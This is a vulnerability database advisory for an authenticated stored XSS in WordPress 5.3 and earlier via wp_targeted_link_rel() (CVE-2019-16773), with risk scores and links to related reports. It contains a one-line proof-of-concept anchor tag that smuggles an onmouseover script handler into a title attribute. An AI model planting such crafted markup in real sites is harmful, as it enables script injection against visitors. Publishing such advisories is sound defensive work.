Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:23553517-34E3-40A9-A406-F3FFBE9DD265
HistoryDec 13, 2019 - 12:00 a.m.

WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links

2019-12-1300:00:00
wpvulndb
92

0.002 Low

EPSS

Percentile

64.4%

JSON

The function wp_targeted_link_rel() can be used in a particular way to result in a Stored Cross-Site Scripting (XSS) vulnerability.

<a href="#" title=" target='abc' rel= onmouseover=alert(/XSS/) ">This is a PoC for a Stored XSS</a>

Related

hackerone 1
wpvulndb 1
veracode 1
cvelist 1
cve 1
nvd 1
openvas 2
hackerone
hackerone
WordPress: Potential unprivileged Stored XSS through wp_targeted_link_rel
2019-03-14 21:37:27
wpvulndb
wpvulndb
WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
2019-12-13 00:00:00
veracode
veracode
Cross-Site Scripting (XSS)
2020-01-09 08:07:52
cvelist
cvelist
CVE-2019-16773
2020-01-09 02:00:16
cve
cve
CVE-2019-16773
2020-01-09 02:15:13
nvd
nvd
CVE-2019-16773
2020-01-09 02:15:13
openvas
openvas
WordPress Multiple Vulnerabilities (Dec 2019) - Windows
2019-12-16 00:00:00
WordPress Multiple Vulnerabilities (Dec 2019) - Linux
2019-12-16 00:00:00

0.002 Low

EPSS

Percentile

64.4%

JSON
Related for WPEX-ID:23553517-34E3-40A9-A406-F3FFBE9DD265
hackerone1wpvulndb1veracode1cvelist1cve1nvd1openvas2